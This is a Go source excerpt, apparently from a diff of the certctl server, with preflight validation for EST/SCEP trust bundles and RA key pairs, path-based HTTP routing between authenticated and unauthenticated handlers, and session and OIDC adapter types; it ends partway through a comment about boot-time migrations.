// EST RFC 7030 hardening master bundle Phase 2.5.
|
|
||||||
//
|
|
||||||
// Mirrors preflightSCEPMTLSTrustBundle's checks (file exists, parses as
|
|
||||||
// PEM, ≥1 cert, none expired) but returns a *trustanchor.Holder rather
|
|
||||||
// than a raw *x509.CertPool — the EST handler stores the holder so a
|
|
||||||
// SIGHUP rotates the trust bundle live without a server restart, exactly
|
|
||||||
// the way the Intune trust anchor rotation works (Phase 8.5 of the SCEP
|
|
||||||
// bundle). The handler-side .Pool() accessor on the holder rebuilds an
|
|
||||||
// x509.CertPool from the current snapshot for each Verify call.
|
|
||||||
//
|
|
||||||
// Uses the shared internal/trustanchor.LoadBundle (extracted in EST
|
|
||||||
// hardening Phase 2.1 from the original Intune-only path) so the EST
|
|
||||||
// + Intune callers exercise the same loader semantics — empty bundle
|
|
||||||
// rejected, expired cert rejected with subject in error message,
|
|
||||||
// non-CERTIFICATE PEM blocks tolerated.
|
|
||||||
func preflightESTMTLSClientCATrustBundle(enabled bool, pathID, bundlePath string, logger *slog.Logger) (*trustanchor.Holder, error) {
|
|
||||||
if !enabled {
|
|
||||||
return nil, nil
|
|
||||||
}
|
|
||||||
if bundlePath == "" {
|
|
||||||
return nil, fmt.Errorf("EST profile (PathID=%q) MTLS enabled but trust bundle path empty: "+
|
|
||||||
"set CERTCTL_EST_PROFILE_<NAME>_MTLS_CLIENT_CA_TRUST_BUNDLE_PATH to a PEM file "+
|
|
||||||
"containing the bootstrap-CA certs the operator allows to enroll", pathID)
|
|
||||||
}
|
|
||||||
holder, err := trustanchor.New(bundlePath, logger)
|
|
||||||
if err != nil {
|
|
||||||
return nil, fmt.Errorf("EST profile (PathID=%q) MTLS trust bundle preflight: %w", pathID, err)
|
|
||||||
}
|
|
||||||
holder.SetLabelForLog(fmt.Sprintf("EST mTLS client CA bundle (PathID=%q)", pathID))
|
|
||||||
return holder, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// preflightSCEPIntuneTrustAnchor validates a per-profile Microsoft Intune
|
|
||||||
// Certificate Connector signing-cert trust bundle.
|
|
||||||
//
|
|
||||||
// SCEP RFC 8894 + Intune master bundle Phase 8.2.
|
|
||||||
//
|
|
||||||
// No-op when this profile has Intune disabled (the common case for
|
|
||||||
// non-Intune SCEP deploys). When enabled:
|
|
||||||
//
|
|
||||||
// 1. Path is non-empty (Validate() refuse covers this too; we re-check
|
|
||||||
// here so the caller can os.Exit(1) with the specific PathID in the
|
|
||||||
// log line).
|
|
||||||
// 2. File exists + readable.
|
|
||||||
// 3. PEM-decodes to ≥1 CERTIFICATE block (intune.LoadTrustAnchor enforces
|
|
||||||
// this and skips non-CERTIFICATE blocks like accidentally-pasted
|
|
||||||
// priv-key blocks).
|
|
||||||
// 4. None of the bundled certs is past NotAfter — an expired Intune
|
|
||||||
// trust anchor would silently reject every Connector challenge at
|
|
||||||
// runtime, which is a much worse failure mode than failing fast at
|
|
||||||
// boot. intune.LoadTrustAnchor enforces this and surfaces the subject
|
|
||||||
// CN in the error message so the operator knows which cert to rotate.
|
|
||||||
//
|
|
||||||
// On success returns the freshly-built *intune.TrustAnchorHolder ready to
|
|
||||||
// inject into the per-profile SCEPService via SetIntuneIntegration. The
|
|
||||||
// holder also installs the SIGHUP watcher (started by the caller).
|
|
||||||
func preflightSCEPIntuneTrustAnchor(enabled bool, pathID, path string, logger *slog.Logger) (*intune.TrustAnchorHolder, error) {
|
|
||||||
if !enabled {
|
|
||||||
return nil, nil
|
|
||||||
}
|
|
||||||
// pathIDLabel renders the empty-string PathID as "<root>" so the
|
|
||||||
// operator's boot-log error doesn't read like a missing variable.
|
|
||||||
pathIDLabel := pathID
|
|
||||||
if pathIDLabel == "" {
|
|
||||||
pathIDLabel = "<root>"
|
|
||||||
}
|
|
||||||
if path == "" {
|
|
||||||
return nil, fmt.Errorf("SCEP profile (PathID=%q) INTUNE enabled but trust anchor path empty: "+
|
|
||||||
"set CERTCTL_SCEP_PROFILE_<NAME>_INTUNE_CONNECTOR_CERT_PATH to a PEM bundle "+
|
|
||||||
"of the Microsoft Intune Certificate Connector's signing certs", pathIDLabel)
|
|
||||||
}
|
|
||||||
holder, err := intune.NewTrustAnchorHolder(path, logger)
|
|
||||||
if err != nil {
|
|
||||||
return nil, fmt.Errorf("SCEP profile (PathID=%q) INTUNE trust anchor load failed: %w (path=%s)", pathIDLabel, err, path)
|
|
||||||
}
|
|
||||||
return holder, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// loadSCEPRAPair reads the RA cert PEM + key PEM and returns the parsed
|
|
||||||
// x509.Certificate + crypto.PrivateKey ready for the SCEP handler's RFC
|
|
||||||
// 8894 path. Called AFTER preflightSCEPRACertKey passed; failures here
|
|
||||||
// indicate a TOCTOU race or a filesystem change between preflight and
|
|
||||||
// the load (rare).
|
|
||||||
//
|
|
||||||
// Cert PEM may carry a chain (CA + RA + intermediate); we use the FIRST
|
|
||||||
// CERTIFICATE block, matching the RFC 8894 §3.5.1 single-cert convention
|
|
||||||
// for the GetCACert response.
|
|
||||||
func loadSCEPRAPair(certPath, keyPath string) (*x509.Certificate, crypto.PrivateKey, error) {
|
|
||||||
certPEM, err := os.ReadFile(certPath)
|
|
||||||
if err != nil {
|
|
||||||
return nil, nil, fmt.Errorf("read RA cert: %w", err)
|
|
||||||
}
|
|
||||||
keyPEM, err := os.ReadFile(keyPath)
|
|
||||||
if err != nil {
|
|
||||||
return nil, nil, fmt.Errorf("read RA key: %w", err)
|
|
||||||
}
|
|
||||||
pair, err := tls.X509KeyPair(certPEM, keyPEM)
|
|
||||||
if err != nil {
|
|
||||||
return nil, nil, fmt.Errorf("parse RA pair: %w", err)
|
|
||||||
}
|
|
||||||
if len(pair.Certificate) == 0 {
|
|
||||||
return nil, nil, fmt.Errorf("RA cert PEM contained no certificate blocks")
|
|
||||||
}
|
|
||||||
leaf, err := x509.ParseCertificate(pair.Certificate[0])
|
|
||||||
if err != nil {
|
|
||||||
return nil, nil, fmt.Errorf("parse RA cert: %w", err)
|
|
||||||
}
|
|
||||||
return leaf, pair.PrivateKey, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// preflightSCEPRACertKey validates the RA cert/key pair the RFC 8894 SCEP
|
|
||||||
// path requires. Mirrors preflightSCEPChallengePassword's no-op-when-disabled
|
|
||||||
// pattern; otherwise the checks are:
|
|
||||||
//
|
|
||||||
// 1. Both paths are non-empty (the Validate() refuse covers this too,
|
|
||||||
// but preflight reports the specific failure mode + os.Exit(1) so the
|
|
||||||
// operator sees a clear log line in addition to the config error).
|
|
||||||
// 2. The key file mode is 0600 (refuse world-/group-readable RA key —
|
|
||||||
// defense-in-depth against credential leak via a misconfigured
|
|
||||||
// deploy that leaves /etc/certctl/scep/*.key as 0644).
|
|
||||||
// 3. Cert PEM parses to exactly one x509.Certificate.
|
|
||||||
// 4. Key PEM parses to a Go crypto.Signer (RSA or ECDSA — RFC 8894
|
|
||||||
// §3.5.2 advertises those as the CMS-compatible algorithms).
|
|
||||||
// 5. The cert's PublicKey matches the key's Public() — refuses pairs
|
|
||||||
// accidentally swapped between profiles in a multi-profile config.
|
|
||||||
// 6. The cert's NotAfter is in the future — an expired RA cert would
|
|
||||||
// fail TLS handshake on EnvelopedData decryption per RFC 5652.
|
|
||||||
//
|
|
||||||
// Each check returns a wrapped error; the caller (main) is responsible for
|
|
||||||
// translating to a structured slog.Error + os.Exit(1) so the helper stays
|
|
||||||
// unit-testable without booting the full server.
|
|
||||||
func preflightSCEPRACertKey(enabled bool, raCertPath, raKeyPath string) error {
|
|
||||||
if !enabled {
|
|
||||||
return nil
|
|
||||||
}
|
|
||||||
if raCertPath == "" || raKeyPath == "" {
|
|
||||||
return fmt.Errorf("SCEP enabled but RA pair missing: " +
|
|
||||||
"set CERTCTL_SCEP_RA_CERT_PATH + CERTCTL_SCEP_RA_KEY_PATH " +
|
|
||||||
"(RFC 8894 §3.2.2 requires an RA pair so clients can encrypt the " +
|
|
||||||
"CSR to the RA cert and the server can sign the CertRep response)")
|
|
||||||
}
|
|
||||||
|
|
||||||
// File mode check FIRST so a world-readable key never gets read into the
|
|
||||||
// process address space. Ignored on Windows (Stat().Mode() doesn't carry
|
|
||||||
// POSIX bits there); the production deploy is Linux per the Dockerfile.
|
|
||||||
keyInfo, err := os.Stat(raKeyPath)
|
|
||||||
if err != nil {
|
|
||||||
return fmt.Errorf("CERTCTL_SCEP_RA_KEY_PATH stat failed: %w (path=%s)", err, raKeyPath)
|
|
||||||
}
|
|
||||||
mode := keyInfo.Mode().Perm()
|
|
||||||
if mode&0o077 != 0 {
|
|
||||||
return fmt.Errorf("CERTCTL_SCEP_RA_KEY_PATH has insecure permissions %#o; "+
|
|
||||||
"RA private key must be mode 0600 (owner read/write only) — "+
|
|
||||||
"chmod 0600 %s and restart", mode, raKeyPath)
|
|
||||||
}
|
|
||||||
|
|
||||||
certPEM, err := os.ReadFile(raCertPath)
|
|
||||||
if err != nil {
|
|
||||||
return fmt.Errorf("CERTCTL_SCEP_RA_CERT_PATH read failed: %w (path=%s)", err, raCertPath)
|
|
||||||
}
|
|
||||||
keyPEM, err := os.ReadFile(raKeyPath)
|
|
||||||
if err != nil {
|
|
||||||
return fmt.Errorf("CERTCTL_SCEP_RA_KEY_PATH read failed: %w (path=%s)", err, raKeyPath)
|
|
||||||
}
|
|
||||||
|
|
||||||
// tls.X509KeyPair validates that the cert + key parse, share an algorithm,
|
|
||||||
// and the cert's PublicKey matches the key's Public() — three of our six
|
|
||||||
// checks in a single stdlib call, so we use it rather than re-implementing.
|
|
||||||
pair, err := tls.X509KeyPair(certPEM, keyPEM)
|
|
||||||
if err != nil {
|
|
||||||
return fmt.Errorf("RA cert/key pair invalid: %w "+
|
|
||||||
"(cert=%s key=%s) — verify the cert and key are matching halves of "+
|
|
||||||
"the same RA pair, both PEM-encoded, with the cert containing exactly "+
|
|
||||||
"one CERTIFICATE block and the key containing one PRIVATE KEY block",
|
|
||||||
err, raCertPath, raKeyPath)
|
|
||||||
}
|
|
||||||
if len(pair.Certificate) == 0 {
|
|
||||||
// Defensive — tls.X509KeyPair already errors on this, but the contract
|
|
||||||
// for the next x509.ParseCertificate call needs the slice non-empty.
|
|
||||||
return fmt.Errorf("RA cert PEM at %s contains no certificate blocks", raCertPath)
|
|
||||||
}
|
|
||||||
|
|
||||||
// Re-parse the leaf so we can read NotAfter + the public-key alg.
|
|
||||||
leaf, err := x509.ParseCertificate(pair.Certificate[0])
|
|
||||||
if err != nil {
|
|
||||||
return fmt.Errorf("RA cert at %s does not parse as x509: %w", raCertPath, err)
|
|
||||||
}
|
|
||||||
if time.Now().After(leaf.NotAfter) {
|
|
||||||
return fmt.Errorf("RA cert at %s expired at %s — "+
|
|
||||||
"generate a fresh RA pair (the SCEP CertRep signature would be "+
|
|
||||||
"rejected by every conformant client)", raCertPath, leaf.NotAfter.Format(time.RFC3339))
|
|
||||||
}
|
|
||||||
|
|
||||||
// CMS-compatible public-key algorithm gate. RFC 8894 §3.5.2 advertises RSA
|
|
||||||
// and AES; the responder cert algorithm pertains to the signature scheme
|
|
||||||
// used on the CertRep, which means the cert's PublicKey must be RSA or
|
|
||||||
// ECDSA. Catches pre-shared Ed25519 dev keys that micromdm/scep clients
|
|
||||||
// reject.
|
|
||||||
switch leaf.PublicKeyAlgorithm {
|
|
||||||
case x509.RSA, x509.ECDSA:
|
|
||||||
// ok — supported by golang.org/x/crypto/ocsp + every SCEP client
|
|
||||||
default:
|
|
||||||
return fmt.Errorf("RA cert at %s uses unsupported public-key algorithm %s — "+
|
|
||||||
"RFC 8894 §3.5.2 CMS signing requires RSA or ECDSA",
|
|
||||||
raCertPath, leaf.PublicKeyAlgorithm)
|
|
||||||
}
|
|
||||||
|
|
||||||
return nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// preflightEnrollmentIssuer validates at startup that an EST/SCEP-bound issuer
|
|
||||||
// can actually serve a CA certificate. This closes audit finding L-005:
|
|
||||||
// pre-Bundle-4 the EST/SCEP startup path verified the issuer existed in the
|
|
||||||
// registry but did not verify the issuer TYPE could emit a CA cert. An
|
|
||||||
// operator who bound CERTCTL_EST_ISSUER_ID to an ACME issuer (which does
|
|
||||||
// not have a static CA cert — see internal/connector/issuer/acme/acme.go::
|
|
||||||
// GetCACertPEM returning an explicit error) would boot successfully and
|
|
||||||
// only see failures at the first /est/cacerts request, hiding the misconfig
|
|
||||||
// for hours/days behind a degraded enrollment surface.
|
|
||||||
//
|
|
||||||
// Strategy: call issuerConn.GetCACertPEM(ctx) at startup with a short
|
|
||||||
// timeout. If the issuer can serve a CA cert (local, vault, openssl,
|
|
||||||
// stepca, awsacmpca, etc.), the call succeeds and we proceed. If not
|
|
||||||
// (acme, digicert, sectigo, entrust, googlecas, ejbca, globalsign — most
|
|
||||||
// vendor-CA issuers that hand back chains per-issuance), the call fails
|
|
||||||
// loudly with the connector's own error string, and the caller os.Exit(1)s.
|
|
||||||
//
|
|
||||||
// Returns nil on success, non-nil error suitable for structured logging
|
|
||||||
// + os.Exit(1) by the caller. Caller is responsible for the timeout context.
|
|
||||||
func preflightEnrollmentIssuer(ctx context.Context, protocol, issuerID string, issuerConn service.IssuerConnector) error {
|
|
||||||
if issuerConn == nil {
|
|
||||||
return fmt.Errorf("%s issuer %q: connector is nil", protocol, issuerID)
|
|
||||||
}
|
|
||||||
caCertPEM, err := issuerConn.GetCACertPEM(ctx)
|
|
||||||
if err != nil {
|
|
||||||
return fmt.Errorf("%s issuer %q: cannot serve CA certificate (%w); "+
|
|
||||||
"choose an issuer type that exposes a static CA chain "+
|
|
||||||
"(local / vault / openssl / stepca / awsacmpca) or disable %s",
|
|
||||||
protocol, issuerID, err, protocol)
|
|
||||||
}
|
|
||||||
if caCertPEM == "" {
|
|
||||||
return fmt.Errorf("%s issuer %q: GetCACertPEM returned empty PEM with no error; "+
|
|
||||||
"choose an issuer type that exposes a static CA chain", protocol, issuerID)
|
|
||||||
}
|
|
||||||
return nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// buildFinalHandler builds the outer HTTP dispatch handler that routes incoming
// requests to either the authenticated apiHandler chain or the unauthenticated
// noAuthHandler chain based on URL path. Extracted from main() so the dispatch
// logic can be unit tested without booting the full server stack
// (see cmd/server/finalhandler_test.go).
//
// Dispatch rules (M-001, audit 2026-04-19, option D), evaluated top to bottom:
//
//   - /health, /ready, /api/v1/auth/info  → no-auth (probes + login detection)
//   - /api/v1/version                     → no-auth (U-3 ride-along: build identity for rollout/probes)
//   - /.well-known/pki, /.well-known/pki/* → no-auth (RFC 5280 CRL, RFC 6960 OCSP)
//   - /.well-known/est*                   → no-auth (RFC 7030 §3.2.3; also covers /.well-known/est-mtls)
//   - /scep, /scep/*                      → no-auth (RFC 8894 §3.2, CSR challengePassword)
//   - /scep-mtls, /scep-mtls/*            → no-auth (client cert + challenge password)
//   - /api/v1/*                           → auth (Bearer token required)
//   - /assets/*                           → static file server (dashboard only)
//   - anything else                       → SPA index.html fallback (dashboard only)
//     OR apiHandler (no dashboard)
//
// EST/SCEP clients (IoT devices, 802.1X supplicants, MDM endpoints, network
// appliances) cannot present certctl Bearer tokens, so those endpoints must be
// reachable without the Auth middleware. Authentication is instead enforced by
// CSR signature verification, profile policy gates, and for SCEP the
// challengePassword shared secret (fail-loud gated by
// preflightSCEPChallengePassword).
//
// The /.well-known/pki gate is anchored to the path segment (exact match or
// "/.well-known/pki/" prefix), like the /scep gate, so a look-alike sibling such
// as /.well-known/pkixyz is not handed to the unauthenticated chain.
//
// webDir must point to a directory containing index.html + assets/ when
// dashboardEnabled is true; it is ignored otherwise.
func buildFinalHandler(apiHandler, noAuthHandler http.Handler, webDir string, dashboardEnabled bool) http.Handler {
	// The static file server only exists when the dashboard is shipped; the
	// !dashboardEnabled case below is reached before it could be used.
	var fileServer http.Handler
	if dashboardEnabled {
		fileServer = http.FileServer(http.Dir(webDir))
	}

	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		path := r.URL.Path

		switch {
		// Health/ready, auth/info, and version bypass auth middleware.
		// Health/ready: Docker/K8s health probes don't carry Bearer tokens.
		// auth/info: React app calls this before login to detect auth mode.
		// version: U-3 ride-along (cat-u-no_version_endpoint) — rollout
		// systems and blackbox probes need build identity without a key.
		case path == "/health", path == "/ready", path == "/api/v1/auth/info", path == "/api/v1/version":
			noAuthHandler.ServeHTTP(w, r)

		// RFC 5280 CRL and RFC 6960 OCSP live under /.well-known/pki/ and MUST
		// be served unauthenticated — relying parties (browsers, OpenSSL, OCSP
		// stapling sidecars, mTLS clients) cannot present certctl Bearer tokens.
		// Segment-anchored so "/.well-known/pkixyz" does not match.
		case path == "/.well-known/pki" || strings.HasPrefix(path, "/.well-known/pki/"):
			noAuthHandler.ServeHTTP(w, r)

		// RFC 7030 EST endpoints ride the no-auth middleware chain (M-001,
		// option D, audit 2026-04-19). Trust boundary is CSR signature +
		// (per EST hardening Phase 2) optional client cert at the handler
		// layer, not HTTP Bearer. /.well-known/est/cacerts is explicitly
		// anonymous per RFC 7030 §4.1.1; /.well-known/est-mtls/<PathID>/
		// (EST hardening Phase 2 sibling route) requires a client cert
		// gate at the handler layer — both share this deliberately loose
		// prefix gate because "/.well-known/est-mtls" is itself prefixed by
		// "/.well-known/est". EST hardening Phase 3's HTTP Basic
		// enrollment-password is a per-profile handler-layer auth that runs
		// INSIDE the no-auth middleware chain (since the chain skips the
		// Bearer middleware, the handler gets to define its own auth contract).
		case strings.HasPrefix(path, "/.well-known/est"):
			noAuthHandler.ServeHTTP(w, r)

		// RFC 8894 SCEP rides the no-auth chain (M-001, option D). SCEP clients
		// authenticate via the challengePassword attribute in the PKCS#10 CSR,
		// not via HTTP Bearer tokens. preflightSCEPChallengePassword refuses to
		// start the server if SCEP is enabled without a non-empty shared secret.
		// "/scepxyz" is not matched: only "/scep" itself or paths under "/scep/".
		case path == "/scep" || strings.HasPrefix(path, "/scep/"):
			noAuthHandler.ServeHTTP(w, r)

		// SCEP RFC 8894 + Intune master bundle Phase 6.5: the sibling
		// /scep-mtls[/<pathID>] route also rides the no-auth chain. Its
		// auth boundary is (a) client cert verified at the TLS layer +
		// re-verified per-profile at the handler layer, plus (b) the
		// challenge password — neither is a Bearer token. It needs its own
		// gate because "/scep-mtls" does not start with "/scep/".
		case path == "/scep-mtls" || strings.HasPrefix(path, "/scep-mtls/"):
			noAuthHandler.ServeHTTP(w, r)

		// Authenticated API routes — full middleware stack including Auth.
		case strings.HasPrefix(path, "/api/v1/"):
			apiHandler.ServeHTTP(w, r)

		// No dashboard: everything non-special falls through to the
		// authenticated handler (preserves pre-M-001 behavior for API-only
		// deployments).
		case !dashboardEnabled:
			apiHandler.ServeHTTP(w, r)

		// Dashboard-present: serve static assets directly...
		case strings.HasPrefix(path, "/assets/"):
			fileServer.ServeHTTP(w, r)

		// ...and fall back to the SPA entry point for everything else.
		default:
			http.ServeFile(w, r, webDir+"/index.html")
		}
	})
}
|
|
||||||
|
|
||||||
// authPermissionCheckerAdapter bridges the typed-string Authorizer
|
|
||||||
// signature (authsvc.Authorizer.CheckPermission takes
|
|
||||||
// authdomain.ActorTypeValue + authdomain.ScopeType) to the plain-string
|
|
||||||
// auth.PermissionChecker interface used by the auth.RequirePermission
|
|
||||||
// middleware factory. Lives in cmd/server so internal/auth doesn't have
|
|
||||||
// to import internal/service/auth + internal/domain/auth (would create
|
|
||||||
// a cycle).
|
|
||||||
type authPermissionCheckerAdapter struct {
|
|
||||||
a *authsvc.Authorizer
|
|
||||||
}
|
|
||||||
|
|
||||||
func (ad authPermissionCheckerAdapter) CheckPermission(
|
|
||||||
ctx context.Context,
|
|
||||||
actorID string,
|
|
||||||
actorType string,
|
|
||||||
tenantID string,
|
|
||||||
permission string,
|
|
||||||
scopeType string,
|
|
||||||
scopeID *string,
|
|
||||||
) (bool, error) {
|
|
||||||
return ad.a.CheckPermission(
|
|
||||||
ctx,
|
|
||||||
actorID,
|
|
||||||
authdomainAlias.ActorTypeValue(actorType),
|
|
||||||
tenantID,
|
|
||||||
permission,
|
|
||||||
authdomainAlias.ScopeType(scopeType),
|
|
||||||
scopeID,
|
|
||||||
)
|
|
||||||
}
|
|
||||||
|
|
||||||
// authCheckResolverAdapter bridges the postgres ActorRoleRepository
|
|
||||||
// (authdomain.ActorTypeValue) to handler.AuthCheckResolver
|
|
||||||
// (domain.ActorType). Lives in cmd/server so the handler layer keeps its
|
|
||||||
// existing import set; the GUI's /v1/auth/check probe round-trips
|
|
||||||
// through this on every page load. Read-only — no caller / no audit row.
|
|
||||||
//
|
|
||||||
// Bundle 1 Phase 3 closure (M1): the equivalent surface area on
|
|
||||||
// /v1/auth/me runs through the service layer's auth.role.list permission
|
|
||||||
// gate, which the GUI may not yet hold during initial render. AuthCheck
|
|
||||||
// has no permission gate (its only requirement is "the request
|
|
||||||
// authenticated"), so the bypass is by design.
|
|
||||||
type authCheckResolverAdapter struct {
|
|
||||||
repo *postgres.ActorRoleRepository
|
|
||||||
}
|
|
||||||
|
|
||||||
func (ad authCheckResolverAdapter) ListRoles(
|
|
||||||
ctx context.Context,
|
|
||||||
actorID string,
|
|
||||||
actorType domain.ActorType,
|
|
||||||
tenantID string,
|
|
||||||
) ([]*authdomainAlias.ActorRole, error) {
|
|
||||||
return ad.repo.ListByActor(ctx, actorID, authdomainAlias.ActorTypeValue(actorType), tenantID)
|
|
||||||
}
|
|
||||||
|
|
||||||
func (ad authCheckResolverAdapter) EffectivePermissions(
|
|
||||||
ctx context.Context,
|
|
||||||
actorID string,
|
|
||||||
actorType domain.ActorType,
|
|
||||||
tenantID string,
|
|
||||||
) ([]repository.EffectivePermission, error) {
|
|
||||||
return ad.repo.EffectivePermissions(ctx, actorID, authdomainAlias.ActorTypeValue(actorType), tenantID)
|
|
||||||
}
|
|
||||||
|
|
||||||
// =============================================================================
|
|
||||||
// sessionMinterAdapter — bridge from *session.Service to oidcsvc.SessionMinter.
|
|
||||||
//
|
|
||||||
// The OIDC service's SessionMinter port (Phase 3) takes a *userdomain.User
|
|
||||||
// + role IDs and returns (cookie, csrf, err). The session.Service's
|
|
||||||
// Create method takes (actorID, actorType, ip, ua) -> *CreateResult.
|
|
||||||
// This adapter unwraps the User into actorID/actorType + reshapes the
|
|
||||||
// return tuple. Lives in cmd/server so the session package doesn't have
|
|
||||||
// to know about user.User and the user package doesn't have to know
|
|
||||||
// about session.CreateResult.
|
|
||||||
// =============================================================================
|
|
||||||
|
|
||||||
type sessionMinterAdapter struct {
|
|
||||||
svc *session.Service
|
|
||||||
}
|
|
||||||
|
|
||||||
func (a *sessionMinterAdapter) MintForUser(
|
|
||||||
ctx context.Context,
|
|
||||||
user *userdomain.User,
|
|
||||||
_ []string, // roleIDs unused at the session-mint layer; the rbac middleware looks them up at request time
|
|
||||||
ip, userAgent string,
|
|
||||||
) (cookieValue, csrfToken string, err error) {
|
|
||||||
if user == nil {
|
|
||||||
return "", "", fmt.Errorf("session mint: user is nil")
|
|
||||||
}
|
|
||||||
res, err := a.svc.Create(ctx, user.ID, string(domain.ActorTypeUser), ip, userAgent)
|
|
||||||
if err != nil {
|
|
||||||
return "", "", err
|
|
||||||
}
|
|
||||||
return res.CookieValue, res.CSRFToken, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// silenceUnusedImports keeps the new oidcsvc + oidcdomain imports load-
|
|
||||||
// bearing in case any file shuffles. Linker dead-code elimination handles
|
|
||||||
// the runtime cost.
|
|
||||||
var (
|
|
||||||
_ = oidcdomain.OIDCProvider{}
|
|
||||||
)
|
|
||||||
|
|
||||||
// =============================================================================
|
|
||||||
// breakglassSessionMinterAdapter — bridge from *session.Service to
|
|
||||||
// breakglass.SessionMinter.
|
|
||||||
//
|
|
||||||
// The break-glass service's SessionMinter port (Phase 7.5) returns
|
|
||||||
// (cookie, csrf, err); the underlying *session.Service.Create returns
|
|
||||||
// *CreateResult. This adapter unwraps the result. Lives in cmd/server
|
|
||||||
// so the breakglass package doesn't have to know about session.Service.
|
|
||||||
// =============================================================================
|
|
||||||
|
|
||||||
type breakglassSessionMinterAdapter struct {
|
|
||||||
svc *session.Service
|
|
||||||
}
|
|
||||||
|
|
||||||
func (a breakglassSessionMinterAdapter) Create(ctx context.Context, actorID, actorType, ip, userAgent string) (string, string, error) {
|
|
||||||
res, err := a.svc.Create(ctx, actorID, actorType, ip, userAgent)
|
|
||||||
if err != nil {
|
|
||||||
return "", "", err
|
|
||||||
}
|
|
||||||
return res.CookieValue, res.CSRFToken, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// RevokeAllForActor — Audit 2026-05-10 HIGH-1 wire. After a break-glass
|
|
||||||
// password rotation or credential removal, every active session for the
|
|
||||||
// target actor must be revoked so a phished-then-rotated credential
|
|
||||||
// doesn't leave the attacker's session live.
|
|
||||||
func (a breakglassSessionMinterAdapter) RevokeAllForActor(ctx context.Context, actorID, actorType string) error {
|
|
||||||
return a.svc.RevokeAllForActor(ctx, actorID, actorType)
|
|
||||||
}
|
|
||||||
|
|
||||||
// oidcProvidersListAdapter bridges the postgres OIDCProviderRepository
|
|
||||||
// to handler.OIDCProvidersListResolver. The handler returns
|
|
||||||
// []*OIDCProviderInfo (id + display_name + login_url) for the public-
|
|
||||||
// safe GUI Login-page payload; the repo returns the full OIDCProvider
|
|
||||||
// row. The adapter projects + maps the login_url shape that
|
|
||||||
// /auth/oidc/login?provider=<id> expects. Auth Bundle 2 Phase 6 /
|
|
||||||
// Category E.
|
|
||||||
type oidcProvidersListAdapter struct {
|
|
||||||
repo repository.OIDCProviderRepository
|
|
||||||
}
|
|
||||||
|
|
||||||
func (a oidcProvidersListAdapter) List(ctx context.Context, tenantID string) ([]*handler.OIDCProviderInfo, error) {
|
|
||||||
provs, err := a.repo.List(ctx, tenantID)
|
|
||||||
if err != nil {
|
|
||||||
return nil, err
|
|
||||||
}
|
|
||||||
out := make([]*handler.OIDCProviderInfo, 0, len(provs))
|
|
||||||
for _, p := range provs {
|
|
||||||
// Audit 2026-05-10 MED-9 closure — filter disabled providers
|
|
||||||
// at the adapter so the LoginPage's "Sign in with X" buttons
|
|
||||||
// don't render for offline IdPs. The HandleAuthRequest
|
|
||||||
// service-layer ErrProviderDisabled check is the
|
|
||||||
// defense-in-depth guard for direct API / MCP / CLI callers.
|
|
||||||
if !p.Enabled {
|
|
||||||
continue
|
|
||||||
}
|
|
||||||
out = append(out, &handler.OIDCProviderInfo{
|
|
||||||
ID: p.ID,
|
|
||||||
DisplayName: p.Name,
|
|
||||||
LoginURL: "/auth/oidc/login?provider=" + p.ID,
|
|
||||||
})
|
|
||||||
}
|
|
||||||
return out, nil
|
|
||||||
}
|
|
||||||
|
|||||||
@@ -0,0 +1,209 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package main
|
||||||
|
|
||||||
|
import (
|
||||||
|
"database/sql"
|
||||||
|
"log/slog"
|
||||||
|
"os"
|
||||||
|
"strings"
|
||||||
|
|
||||||
|
"github.com/certctl-io/certctl/internal/config"
|
||||||
|
"github.com/certctl-io/certctl/internal/repository/postgres"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 8b (2026-05-14): the deferred half of
|
||||||
|
// Sprint 8. Extracts the boot-time migration handling from main()'s
|
||||||
|
// inline body into two unexported helpers. Different shape from
|
||||||
|
// Sprints 1-7 (data-type relocation) and from Sprint 8a (existing
|
||||||
|
// helper-function relocation) — this sprint crosses the
|
||||||
|
// behavior-change boundary Sprint 8 first identified.
|
||||||
|
//
|
||||||
|
// What lives here
|
||||||
|
// ===============
|
||||||
|
// parseMigrateOnlyFlag() bool
|
||||||
|
// Hand-parses os.Args for `--migrate-only` (NOT flag.Parse — the
|
||||||
|
// server's config surface is otherwise env-var driven via
|
||||||
|
// config.Load; introducing flag.Parse's global state risks
|
||||||
|
// conflicting with other binaries that may import cmd/server later).
|
||||||
|
//
|
||||||
|
// runBootMigrations(cfg, db, logger, migrateOnly) (exitNow bool)
|
||||||
|
// Owns the Phase 4 DEPL-M1 migration-via-hook posture: the
|
||||||
|
// migrationsViaHook env-var read, the RunMigrations + RunSeed
|
||||||
|
// gate, the --migrate-only early-exit signal, and the
|
||||||
|
// CERTCTL_DEMO_SEED demo-overlay branch.
|
||||||
|
//
|
||||||
|
// Returns true ONLY when --migrate-only was set and migrations +
|
||||||
|
// seed completed cleanly. The caller (main) translates that to
|
||||||
|
// `return` rather than os.Exit(0) — which is the SOLE intentional
|
||||||
|
// behavior change in this sprint (see below).
|
||||||
|
//
|
||||||
|
// Behavior preservation contract
|
||||||
|
// ==============================
|
||||||
|
// Every error path inside runBootMigrations calls os.Exit(1)
|
||||||
|
// directly, matching the original inline behavior byte-for-byte
|
||||||
|
// (same log message, same exit code, same no-defer-run-on-fatal
|
||||||
|
// semantics). The error-path os.Exit(1) is intentional: when
|
||||||
|
// migration fails at boot, the server cannot recover, and bailing
|
||||||
|
// out without running defers is the original Go-idiomatic shape.
|
||||||
|
//
|
||||||
|
// The ONE behavior change: the --migrate-only SUCCESS path now
|
||||||
|
// returns to main() rather than calling os.Exit(0) inline. This
|
||||||
|
// has one observable effect: the `defer db.Close()` registered in
|
||||||
|
// main() now runs at clean exit instead of being skipped. That's
|
||||||
|
// strictly better hygiene (clean DB connection shutdown vs OS
|
||||||
|
// reclaim). The migration work is synchronous + complete before
|
||||||
|
// the return; nothing async is left running that db.Close() could
|
||||||
|
// truncate.
|
||||||
|
//
|
||||||
|
// All other paths — the migration log messages, the seed log
|
||||||
|
// messages, the migrationsViaHook env-var read order, the
|
||||||
|
